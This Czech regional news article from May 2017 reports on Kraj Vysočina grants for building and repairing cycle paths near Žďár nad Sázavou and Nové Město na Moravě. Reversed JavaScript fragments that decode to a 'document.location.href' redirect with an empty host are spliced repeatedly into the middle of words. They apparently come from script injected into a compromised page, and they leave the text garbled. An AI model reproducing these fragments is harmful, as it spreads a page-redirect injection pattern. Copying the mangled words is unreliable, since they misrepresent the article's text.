Rainbow page separator

Krajské dotace podpoří cyklostezky okolo Žďáru i Nového Města

Pondělí, 1. května 2017

Cyklostezka

Žďársko / Kraj Vysočina finančně podpoří vznik plánovaných cyklostezek v okolí Žďáru nad Sázavou a Nového Města na Moravě. Celkem dvě desítky úspěšných žadatelů gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového programu Fondu Vysočiny s názvem Cyklodoprava a cykloturistika 2017 si le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos mezi sebou rozdělí dohromady čtyři miliony korun. „Krajské dotace půjdou na výstavbu a rekonstrukci odpočívadel v rámci cyklotras, na zpracování projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace cyklostezek a na zlepšení povrchů komunikací stávající sítě cyklotras i místních účelových komunikací,“ informoval náměstek hejtmana Kraje Vysočina pro oblast regionálního rozvoje Pavel Pacal.
Část dotací už schválili krajští radní, o přidělení dalších budou jednat zastupitelé na svém květnovém zasedání. Pokud kraj navržené dotace žadatelům schválí, blíže realizaci se ocitnou také nové trasy v okolí Žďáru. Projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou dokumentaci na budoucí cyklostezky v regionu Velké Dářko vyho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toví s pomocí krajských prostředků Subregion Velké Dářko, podobně využije prostředky i Mikroregion Novoměstsko, respektive obce Nová Ves u Nového Města na Moravě nebo Radňovice. Opravy za pomoci dotace se rovněž dočká další úsek páteřní cyklostezky ve Žďáře nad Sázavou.